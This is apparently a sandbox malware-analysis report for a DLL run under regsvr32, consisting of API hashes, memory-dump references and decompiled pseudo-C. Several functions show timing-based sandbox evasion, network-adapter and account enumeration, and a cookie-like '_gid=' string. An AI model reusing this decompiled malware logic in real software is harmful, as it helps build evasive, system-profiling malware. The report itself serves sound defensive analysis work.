                                                                                                                                                                                                                  • Associated: 00000004.00000002.2124779092.000007FEF8F9E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                  • Associated: 00000004.00000002.2124784872.000007FEF8FA0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: Thread$CreateCurrentDuplicateHandleObjectPriorityResumeSingleWait
                                                                                                                                                                                                                  • String ID: DllRegisterServer$G$_
                                                                                                                                                                                                                  • API String ID: 1174013218-1650116920
                                                                                                                                                                                                                  • Opcode ID: fb96d5351e15185721c7c678f22100d1a9f993aebe460c17edc53ec82f678213
                                                                                                                                                                                                                  • Instruction ID: 6608af3ea9cadc71cadd7eaf5fd0afc6bc6969bf4d43f0012be74416a8711f7a
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fb96d5351e15185721c7c678f22100d1a9f993aebe460c17edc53ec82f678213
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7D31F772908B858AE764CF25F84435AB6E2F789364F504039D68C97B78EB7CD158CF40
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 000007FEF8F920A0, Relevance: 3.4, APIs: 1, Strings: 1, Instructions: 406memoryCOMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000004.00000002.2124753507.000007FEF8F91000.00000020.00020000.sdmp, Offset: 000007FEF8F90000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000004.00000002.2124747421.000007FEF8F90000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                  • Associated: 00000004.00000002.2124770251.000007FEF8F95000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                  • Associated: 00000004.00000002.2124779092.000007FEF8F9E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                  • Associated: 00000004.00000002.2124784872.000007FEF8FA0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                                                                                  • String ID: @
                                                                                                                                                                                                                  • API String ID: 4275171209-2766056989
                                                                                                                                                                                                                  • Opcode ID: 81cc5fa61e63df9641c82d5ec4088076d96df196aa3fedfd4a34d15b22035c1b
                                                                                                                                                                                                                  • Instruction ID: d852fcecc8c65b33074624bcc973cb4eb89098c5c099dee049a95ff6459d2f31
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 81cc5fa61e63df9641c82d5ec4088076d96df196aa3fedfd4a34d15b22035c1b
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DF326C76609BC48AD7B5CB56F49079AB7A5F7C9B90F10802AEACD93B18DB38C154CF01
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 002010AC, Relevance: 3.0, APIs: 2, Instructions: 10COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000004.00000002.2122406529.0000000000200000.00000040.00000001.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: ExitProcessSleepUser
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 354099737-0
                                                                                                                                                                                                                  • Opcode ID: 0042952dd3aad89d8123fb1b19f0e5b4d8c6ab7462fdf89570b08f587bfd53b2
                                                                                                                                                                                                                  • Instruction ID: 10d80fdca22810e5da5c10328df80ee21a9756f5c7852084ec4bac4bf90f0e13
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0042952dd3aad89d8123fb1b19f0e5b4d8c6ab7462fdf89570b08f587bfd53b2
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B9C08C30520780C2F31D7B60E88C3282237A700305F00861DC34305AE28F3C04F8C703
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 000007FEF8F93100, Relevance: 1.7, APIs: 1, Instructions: 216libraryCOMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000004.00000002.2124753507.000007FEF8F91000.00000020.00020000.sdmp, Offset: 000007FEF8F90000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000004.00000002.2124747421.000007FEF8F90000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                  • Associated: 00000004.00000002.2124770251.000007FEF8F95000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                  • Associated: 00000004.00000002.2124779092.000007FEF8F9E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                  • Associated: 00000004.00000002.2124784872.000007FEF8FA0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: LibraryLoad
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 1029625771-0
                                                                                                                                                                                                                  • Opcode ID: 71a4d3e6afc3869dd51c089c56fbff1864f24b1d1d871186f2474ca292a1132a
                                                                                                                                                                                                                  • Instruction ID: 3adc23c25f3a0f1b8435709f589f86897b1c8289c5bdacba1448a615a5bf1034
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 71a4d3e6afc3869dd51c089c56fbff1864f24b1d1d871186f2474ca292a1132a
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 19D13F76509BC486D774CB4AE49039AB7A1F3C9790F10902AEACD93B68DF78C094CF40
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 002022DC, Relevance: 1.6, APIs: 1, Instructions: 93COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • LookupAccountNameW.ADVAPI32 ref: 0020233C
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000004.00000002.2122406529.0000000000200000.00000040.00000001.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: AccountLookupName
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 1484870144-0
                                                                                                                                                                                                                  • Opcode ID: cafe0df7641921cb4b3b83197fca258bc474e661d5f4a52d45703bbf776aa30b
                                                                                                                                                                                                                  • Instruction ID: 4b0ea20dc380f593552e4f97726c677bb179d0827474fd1791e922d15cb8090e
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cafe0df7641921cb4b3b83197fca258bc474e661d5f4a52d45703bbf776aa30b
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 20318DB2711B41CAEB149FB4E84839933A5EB48B88F588136DB4D67B5AEF38C55CC340
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 00202434, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  C-Code - Quality: 58%
                                                                                                                                                                                                                  			E00202434(void* __eax, signed long long __rax, signed long long __rbx, signed int __rcx, signed long long __rdx, long long __rdi, void* __rsi, void* __r9, void* __r11, void* __r14) {
				void* __rbp;
				void* _t27;
				void* _t40;
				void* _t41;
				signed long long _t51;
				signed long long _t52;
				signed long long _t64;
				long long _t69;
				void* _t73;
				void* _t75;
				void* _t82;

				_t82 = __r9;
				_t71 = __rsi;
				_t69 = __rdi;
				_t64 = __rdx;
				_t52 = __rbx;
				_t51 = __rax;
				 *((long long*)(_t75 + 0x18)) = __rbx;
				 *((long long*)(_t75 + 0x20)) = __rdi;
				_t73 = _t75 - 0x57;
				_t4 = _t52 + 4; // 0x4
				_t40 = _t4;
				goto L1;
				L9:
				return 0;
				L1:
				asm("rdtsc");
				_t64 = _t64 << 0x20;
				_t51 = _t51 | _t64;
				_t52 = _t52 << 0x00000010 | __rcx;
				SleepEx(??, ??); // executed
				_t69 = _t69 - 1;
				if(_t69 != 0) {
					goto L1;
				} else {
					wsprintfA();
					E002011FC(_t73 - 0x29, _t52);
					_t37 = E0020153C(_t73 - 0x29);
					E00202C08( *((intOrPtr*)(_t73 + 0x17)), _t23, _t40, _t51, _t52, __rsi, _t73, _t73 - 0x49, _t82);
					_t44 = _t51;
					if(_t51 != 0) {
						_t80 = _t73 + 0x67;
						if(E00201EEC(_t37, _t44, _t51, _t52, _t73 + 0x1b, _t51, _t71, _t73, _t73 + 0x67, _t73 + 0x6f, __r11, __r14) != 0) {
							_t67 =  *((intOrPtr*)(_t73 + 0x6f));
							if( *((intOrPtr*)(_t73 + 0x6f)) >= 0x400) {
								_t27 = E0020272C(0, _t37, _t40,  *((intOrPtr*)(_t73 + 0x67)), _t67, _t69, _t73, _t80, __r11, __r14);
								_t55 =  *((intOrPtr*)(_t73 + 0x67));
								_t41 = _t27;
								if( *((intOrPtr*)(_t73 + 0x67)) != 0) {
									GetProcessHeap();
									HeapFree(??, ??, ??);
								}
								E00201FD0(_t41, _t51, _t55, _t73 - 0x49, _t71);
								_t49 = _t51;
								if(_t51 != 0) {
									E00202A1C(_t49, _t73 + 0x1b, _t51);
								}
							}
						}
					}
					goto L9;
				}
			}














                                                                                                                                                                                                                  0x00202434
                                                                                                                                                                                                                  0x00202434
                                                                                                                                                                                                                  0x00202434
                                                                                                                                                                                                                  0x00202434
                                                                                                                                                                                                                  0x00202434
                                                                                                                                                                                                                  0x00202434
                                                                                                                                                                                                                  0x00202434
                                                                                                                                                                                                                  0x00202439
                                                                                                                                                                                                                  0x0020243f
                                                                                                                                                                                                                  0x0020244d
                                                                                                                                                                                                                  0x0020244d
                                                                                                                                                                                                                  0x0020244d
                                                                                                                                                                                                                  0x00202512
                                                                                                                                                                                                                  0x00202528
                                                                                                                                                                                                                  0x00202450
                                                                                                                                                                                                                  0x00202454
                                                                                                                                                                                                                  0x00202456
                                                                                                                                                                                                                  0x0020245a
                                                                                                                                                                                                                  0x00202460
                                                                                                                                                                                                                  0x00202468
                                                                                                                                                                                                                  0x0020246e
                                                                                                                                                                                                                  0x00202472
                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                  0x00202474
                                                                                                                                                                                                                  0x00202482
                                                                                                                                                                                                                  0x0020248c
                                                                                                                                                                                                                  0x0020249d
                                                                                                                                                                                                                  0x0020249f
                                                                                                                                                                                                                  0x002024a4
                                                                                                                                                                                                                  0x002024a7
                                                                                                                                                                                                                  0x002024b0
                                                                                                                                                                                                                  0x002024bf
                                                                                                                                                                                                                  0x002024c1
                                                                                                                                                                                                                  0x002024cc
                                                                                                                                                                                                                  0x002024d2
                                                                                                                                                                                                                  0x002024d7
                                                                                                                                                                                                                  0x002024db
                                                                                                                                                                                                                  0x002024e0
                                                                                                                                                                                                                  0x002024e2
                                                                                                                                                                                                                  0x002024f0
                                                                                                                                                                                                                  0x002024f0
                                                                                                                                                                                                                  0x002024fc
                                                                                                                                                                                                                  0x00202501
                                                                                                                                                                                                                  0x00202504
                                                                                                                                                                                                                  0x0020250d
                                                                                                                                                                                                                  0x0020250d
                                                                                                                                                                                                                  0x00202504
                                                                                                                                                                                                                  0x002024cc
                                                                                                                                                                                                                  0x002024bf
                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                  0x002024a7

                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000004.00000002.2122406529.0000000000200000.00000040.00000001.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: Sleep
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 3472027048-0
                                                                                                                                                                                                                  • Opcode ID: 20254b6f6f1ff962b78622cb32e4c72357f2ae928b9d5189ffb1cb94102db212
                                                                                                                                                                                                                  • Instruction ID: 6acef987b91d238e731fd9a5f681704869e5b00656527f97a441a3d0e419367b
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 20254b6f6f1ff962b78622cb32e4c72357f2ae928b9d5189ffb1cb94102db212
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0921CF72310B41CAEF14EFB1E8583DD23A2E788784F884426EF0D5769AEE38D529C750
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 0020260C, Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,0000011C,00201E13), ref: 0020264B
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000004.00000002.2122406529.0000000000200000.00000040.00000001.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: InfoNativeSystem
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 1721193555-0
                                                                                                                                                                                                                  • Opcode ID: e07d5386416b452ae357def83d54998eea7d12d9b96eaf79d3048644093a814a
                                                                                                                                                                                                                  • Instruction ID: d41baaa2d3036e28e01795de75e0ab1c9d7bec7a3d8c9b824f68205077471eef
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e07d5386416b452ae357def83d54998eea7d12d9b96eaf79d3048644093a814a
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 56E01262B25745D2DF15FB20E8583993362FB94704F844226965E426A5EF3CD65DC700
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 00201000, Relevance: 1.5, APIs: 1, Instructions: 13threadCOMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000004.00000002.2122406529.0000000000200000.00000040.00000001.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: CreateThread
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 2422867632-0
                                                                                                                                                                                                                  • Opcode ID: d810e3ef372af79f05ccbcc8a3c3fc3137e58aa0d92ff2561a569d39733649b8
                                                                                                                                                                                                                  • Instruction ID: dddc93472b349a903efe13cc16ee5ee983fe16b1b213149b7c6cde98ffc81f68
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d810e3ef372af79f05ccbcc8a3c3fc3137e58aa0d92ff2561a569d39733649b8
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F1D0A7B2E1034083E7349B10EA5A3992722F3D4315FC0C206CA8944955CF3CC168C600
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Non-executed Functions

                                                                                                                                                                                                                  Analysis Process: regsvr32.exe PID: 2296 Parent PID: 2632 regsvr32.exeCOMMON

                                                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                                                  Function 020F27BC, Relevance: 3.1, APIs: 2, Instructions: 87COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  C-Code - Quality: 25%
                                                                                                                                                                                                                  			E020F27BC(long long __rbx, void* __rcx, signed long long __rsi, long long __rbp, void* _a8, void* _a16, void* _a24, void* _a32) {
				void* __rdi;
				int _t23;
				void* _t24;
				void* _t27;
				intOrPtr _t35;
				void* _t36;
				intOrPtr* _t44;
				long long _t46;
				intOrPtr* _t48;
				intOrPtr* _t54;
				intOrPtr* _t62;
				signed long long _t64;
				long long* _t67;
				intOrPtr* _t69;
				void* _t77;
				void* _t78;
				struct HINSTANCE__* _t79;
				void* _t80;
				CHAR* _t82;
				char* _t83;

				_t64 = __rsi;
				_t46 = __rbx;
				_t44 = _t69;
				 *((long long*)(_t44 + 8)) = __rbx;
				 *((long long*)(_t44 + 0x18)) = __rbp;
				 *((long long*)(_t44 + 0x20)) = __rsi;
				_push(_t62);
				_t80 = __rcx;
				_t83 = L"; _gid=";
				 *(_t44 + 0x10) =  *(_t44 + 0x10) & 0;
				LoadLibraryA(_t82);
				GetProcAddress(_t79);
				_t67 = _t44;
				if(_t44 == 0) {
					L6:
					r9d = 1;
					_t23 = E020F2990(_t36, _t44, _t46, _t80, L"; _gid=", _t62, 0x20f70c4, _t77, _t78);
					L7:
					return _t23;
				}
				_t24 =  *_t67(); // executed
				if(_t24 == 0x6f && __rbx != 0) {
					GetProcessHeap();
					_t9 = _t64 + 8; // 0x8
					_t36 = _t9;
					HeapAlloc(??, ??, ??);
					_t62 = _t44;
					if(_t44 == 0) {
						goto L6;
					}
					_t54 = _t44; // executed
					_t27 =  *_t67(); // executed
					if(_t27 == 0) {
						_t48 = _t62;
						do {
							if( *((char*)(_t48 + 0x1c0)) != 0x30 ||  *((char*)(_t48 + 0x1c1)) != 0x2e) {
								_t35 =  *((intOrPtr*)(_t48 + 0x194));
								if(_t54 - 1 <= 7) {
									r9d = _t35;
									_t18 = _t48 + 0x198; // 0x198
									_t54 = _t80 + _t64 * 2;
									E020F2990(_t36, _t44, _t48, _t54, _t83, _t62, _t18, _t77, _t78);
									_t64 = _t64 + _t44;
									_t83 = ":";
								}
							}
							_t48 =  *_t48;
						} while (_t48 != 0);
						GetProcessHeap();
						_t36 = 0;
						_t23 = HeapFree(??, ??, ??);
						if(_t64 == 0) {
							goto L6;
						}
						goto L7;
					}
					GetProcessHeap();
					_t36 = 0;
					HeapFree(??, ??, ??);
				}
			}























                                                                                                                                                                                                                  0x020f27bc
                                                                                                                                                                                                                  0x020f27bc
                                                                                                                                                                                                                  0x020f27bc
                                                                                                                                                                                                                  0x020f27bf
                                                                                                                                                                                                                  0x020f27c3
                                                                                                                                                                                                                  0x020f27c7
                                                                                                                                                                                                                  0x020f27cb
                                                                                                                                                                                                                  0x020f27d4
                                                                                                                                                                                                                  0x020f27d7
                                                                                                                                                                                                                  0x020f27e7
                                                                                                                                                                                                                  0x020f27ea
                                                                                                                                                                                                                  0x020f27fa
                                                                                                                                                                                                                  0x020f2800
                                                                                                                                                                                                                  0x020f2806
                                                                                                                                                                                                                  0x020f285f
                                                                                                                                                                                                                  0x020f285f
                                                                                                                                                                                                                  0x020f2876
                                                                                                                                                                                                                  0x020f287b
                                                                                                                                                                                                                  0x020f2893
                                                                                                                                                                                                                  0x020f2893
                                                                                                                                                                                                                  0x020f280f
                                                                                                                                                                                                                  0x020f2814
                                                                                                                                                                                                                  0x020f281f
                                                                                                                                                                                                                  0x020f282c
                                                                                                                                                                                                                  0x020f282c
                                                                                                                                                                                                                  0x020f282f
                                                                                                                                                                                                                  0x020f2835
                                                                                                                                                                                                                  0x020f283b
                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                  0x020f2842
                                                                                                                                                                                                                  0x020f2845
                                                                                                                                                                                                                  0x020f2849
                                                                                                                                                                                                                  0x020f2894
                                                                                                                                                                                                                  0x020f2897
                                                                                                                                                                                                                  0x020f289e
                                                                                                                                                                                                                  0x020f28a9
                                                                                                                                                                                                                  0x020f28b5
                                                                                                                                                                                                                  0x020f28b7
                                                                                                                                                                                                                  0x020f28ba
                                                                                                                                                                                                                  0x020f28c1
                                                                                                                                                                                                                  0x020f28c8
                                                                                                                                                                                                                  0x020f28cd
                                                                                                                                                                                                                  0x020f28d0
                                                                                                                                                                                                                  0x020f28d0
                                                                                                                                                                                                                  0x020f28b5
                                                                                                                                                                                                                  0x020f28d7
                                                                                                                                                                                                                  0x020f28da
                                                                                                                                                                                                                  0x020f28df
                                                                                                                                                                                                                  0x020f28e8
                                                                                                                                                                                                                  0x020f28ed
                                                                                                                                                                                                                  0x020f28f6
                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                  0x020f28fc
                                                                                                                                                                                                                  0x020f284b
                                                                                                                                                                                                                  0x020f2854
                                                                                                                                                                                                                  0x020f2859
                                                                                                                                                                                                                  0x020f2859

                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • GetAdaptersInfo.IPHLPAPI(?,?,00000000,020F2CFE,?,?,00000003,020F24A4), ref: 020F280F
                                                                                                                                                                                                                  • GetAdaptersInfo.IPHLPAPI(?,?,00000000,020F2CFE,?,?,00000003,020F24A4), ref: 020F2845
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000005.00000002.2130490322.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: true
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: AdaptersInfo
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 3177971545-0
                                                                                                                                                                                                                  • Opcode ID: fc699fa13e68b788d874d6a78f58e359039745370b383d3aa825a9febfb906a8
                                                                                                                                                                                                                  • Instruction ID: 81d748be7a7ec0394d7c290c6bd515e431e723f87c72dc0eb748ae97104d18b7
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fc699fa13e68b788d874d6a78f58e359039745370b383d3aa825a9febfb906a8
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 09319071682B809AEBA6DB61E94879977A1FB45F94F484035CF0D07F65EF38C18AD300
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 020F1678, Relevance: 3.1, APIs: 2, Instructions: 77memorynativeCOMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • NtQuerySystemInformation.NTDLL(?,?,00000000,020F2CB1,?,?,00000003,020F24A4), ref: 020F16CB
                                                                                                                                                                                                                  • RtlAllocateHeap.NTDLL(?,?,00000000,020F2CB1,?,?,00000003,020F24A4), ref: 020F1709
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000005.00000002.2130490322.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: true
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: AllocateHeapInformationQuerySystem
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 3114120137-0
                                                                                                                                                                                                                  • Opcode ID: 15ab51baa947bc1f3c3fdf1eb6848148db47552542206cc3bcd8ce7c2f187386
                                                                                                                                                                                                                  • Instruction ID: 6d147805d026ecf825ec1315059daf936bbf5bc179a7c94f2c22597a1bd64eec
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 15ab51baa947bc1f3c3fdf1eb6848148db47552542206cc3bcd8ce7c2f187386
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E4217C35395B40C3EBE68B52A94836AA2B2BB89BD1F084038DF4E87F55EF3CC4459700
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 020F1810, Relevance: 1.7, APIs: 1, Instructions: 198memoryCOMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000005.00000002.2130490322.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: true
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: AllocateHeap
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 1279760036-0
                                                                                                                                                                                                                  • Opcode ID: c3a72f5bfcfd91918b5e83c3bb15c180b6cc2b39742bdcf2d413e26ac2e8c0cf
                                                                                                                                                                                                                  • Instruction ID: dab2a765d79c35b4ce43ceae67845a1cdf3d2ca951dd00dccf692b816b25501f
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c3a72f5bfcfd91918b5e83c3bb15c180b6cc2b39742bdcf2d413e26ac2e8c0cf
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9A71AB32340B81C7EBA5CF66E944BAA77A5FB88B98F4481299F4A53F14DF38C155C700
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 020F10AC, Relevance: 3.0, APIs: 2, Instructions: 10COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000005.00000002.2130490322.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: true
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: ExitProcessSleepUser
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 354099737-0
                                                                                                                                                                                                                  • Opcode ID: 0042952dd3aad89d8123fb1b19f0e5b4d8c6ab7462fdf89570b08f587bfd53b2
                                                                                                                                                                                                                  • Instruction ID: 229234e4ed84272936de8181504c26b3a5fd3c2d12ddf58fbef5b9d8ddf50cce
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0042952dd3aad89d8123fb1b19f0e5b4d8c6ab7462fdf89570b08f587bfd53b2
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 02C01230188780C2E2EE9720AA4C3296264A380209F000629830A85EE18F781088C202
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 020F22DC, Relevance: 1.6, APIs: 1, Instructions: 93COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • LookupAccountNameW.ADVAPI32 ref: 020F233C
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000005.00000002.2130490322.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: true
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: AccountLookupName
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 1484870144-0
                                                                                                                                                                                                                  • Opcode ID: cafe0df7641921cb4b3b83197fca258bc474e661d5f4a52d45703bbf776aa30b
                                                                                                                                                                                                                  • Instruction ID: b73c058cdcc6558029bd0d4b27643151a5f3668e1bea62b2b67ac25a1a04bf43
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cafe0df7641921cb4b3b83197fca258bc474e661d5f4a52d45703bbf776aa30b
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C5316762741B418AEBA68FB4E98839A33E4EB48B88F584135DF4D47E19EF38C148D340
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 020F2434, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  C-Code - Quality: 58%
                                                                                                                                                                                                                  			E020F2434(void* __eax, signed long long __rax, signed long long __rbx, signed int __rcx, signed long long __rdx, long long __rdi, void* __rsi, void* __r9, void* __r11, void* __r14) {
				void* __rbp;
				void* _t27;
				void* _t40;
				void* _t41;
				signed long long _t51;
				signed long long _t52;
				signed long long _t64;
				long long _t69;
				void* _t73;
				void* _t75;
				void* _t82;

				_t82 = __r9;
				_t71 = __rsi;
				_t69 = __rdi;
				_t64 = __rdx;
				_t52 = __rbx;
				_t51 = __rax;
				 *((long long*)(_t75 + 0x18)) = __rbx;
				 *((long long*)(_t75 + 0x20)) = __rdi;
				_t73 = _t75 - 0x57;
				_t4 = _t52 + 4; // 0x4
				_t40 = _t4;
				goto L1;
				L9:
				return 0;
				L1:
				asm("rdtsc");
				_t64 = _t64 << 0x20;
				_t51 = _t51 | _t64;
				_t52 = _t52 << 0x00000010 | __rcx;
				SleepEx(??, ??); // executed
				_t69 = _t69 - 1;
				if(_t69 != 0) {
					goto L1;
				} else {
					wsprintfA();
					E020F11FC(_t73 - 0x29, _t52);
					_t37 = E020F153C(_t73 - 0x29);
					E020F2C08( *((intOrPtr*)(_t73 + 0x17)), _t23, _t40, _t51, _t52, __rsi, _t73, _t73 - 0x49, _t82);
					_t44 = _t51;
					if(_t51 != 0) {
						_t80 = _t73 + 0x67;
						if(E020F1EEC(_t37, _t44, _t51, _t52, _t73 + 0x1b, _t51, _t71, _t73, _t73 + 0x67, _t73 + 0x6f, __r11, __r14) != 0) {
							_t67 =  *((intOrPtr*)(_t73 + 0x6f));
							if( *((intOrPtr*)(_t73 + 0x6f)) >= 0x400) {
								_t27 = E020F272C(0, _t37, _t40,  *((intOrPtr*)(_t73 + 0x67)), _t67, _t69, _t73, _t80, __r11, __r14);
								_t55 =  *((intOrPtr*)(_t73 + 0x67));
								_t41 = _t27;
								if( *((intOrPtr*)(_t73 + 0x67)) != 0) {
									GetProcessHeap();
									HeapFree(??, ??, ??);
								}
								E020F1FD0(_t41, _t51, _t55, _t73 - 0x49, _t71);
								_t49 = _t51;
								if(_t51 != 0) {
									E020F2A1C(_t49, _t73 + 0x1b, _t51);
								}
							}
						}
					}
					goto L9;
				}
			}














                                                                                                                                                                                                                  0x020f2434
                                                                                                                                                                                                                  0x020f2434
                                                                                                                                                                                                                  0x020f2434
                                                                                                                                                                                                                  0x020f2434
                                                                                                                                                                                                                  0x020f2434
